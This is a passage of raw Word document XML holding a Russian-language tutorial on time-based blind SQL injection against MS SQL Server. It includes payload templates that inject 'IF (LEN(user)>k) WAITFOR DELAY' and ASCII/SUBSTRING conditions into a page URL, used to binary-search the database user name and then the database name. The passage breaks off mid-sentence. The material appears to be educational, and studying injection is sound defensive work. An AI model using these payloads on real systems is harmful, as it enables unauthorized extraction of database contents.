        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (LEN(object)=k) WAITFOR DELAY ‘time’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3BF9" w:rsidRPr="00ED40D4" w:rsidRDefault="00AC3FC3" w:rsidP="00AC3FC3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidR="003C3BF9" w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="003C3BF9" w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>об</w:t>
      </w:r>
      <w:r w:rsidR="00ED40D4" w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ъ</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ект базы данных, для которого определяется длина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3BF9" w:rsidRPr="00ED40D4" w:rsidRDefault="00AC3FC3" w:rsidP="00AC3FC3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – количество символов в имени </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, т.е. длина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3FC3" w:rsidRPr="00ED40D4" w:rsidRDefault="00AC3FC3" w:rsidP="00AC3FC3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – время, через которое выполнится запрос, т.е. время </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>подвисания</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED40D4" w:rsidRDefault="00ED40D4" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаблон определения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имени какого-либо объекта базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED40D4" w:rsidRPr="00ED40D4" w:rsidRDefault="00ED40D4" w:rsidP="003654EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (ASCII(LOWER(SUBSTRING((object</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start,length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)))&gt;97) WAITFOR DELAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED40D4" w:rsidRPr="00ED40D4" w:rsidRDefault="00ED40D4" w:rsidP="00671BB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – объект базы данных, для которого определяется длина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003654EA" w:rsidRPr="00673E72" w:rsidRDefault="002A4219" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример определения количества символов в имени пользователя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4219" w:rsidRPr="003654EA" w:rsidRDefault="003654EA" w:rsidP="003654EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Бинарным поиском ищем длину имени текущего пользователя - </w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</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site</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page</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asp</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id</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=1; </w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IF</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELAY</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00053534" w:rsidRDefault="00053534" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">правильных значениях </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> страница должна зависнуть на 10 секунд, если длинна</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имени пользователя СУБД больше числа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRDefault="00053534" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее необходимо определить имя пользователя. Будем перебирать ко</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ды символов по позициям в имени. Этот способ требует гораздо большего количества запросов, но его также можно производить бинарным поиском. Пример</w:t>
      </w:r>
      <w:r w:rsidR="003654EA" w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00053534" w:rsidRDefault="00053534" w:rsidP="001B1F8C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LOWER</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003654EA" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)))&gt;97) WAITFOR </w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003654EA" w:rsidRDefault="003654EA" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="0" w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При правильных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мы либо уменьшаем зону поиска соответствующего символа либо непосредственно находим его. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00673E72" w:rsidRDefault="000606E8" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRDefault="008A325B" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="706"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее необходимо</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> всё тем же</w:t>
      </w:r>
      <w:r w:rsidRPr="008A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>бинарным поиском определить дли</w:t>
      </w:r>
      <w:r w:rsidRPr="008A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ну имени текуще</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="008A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> баз</w:t>
      </w:r>
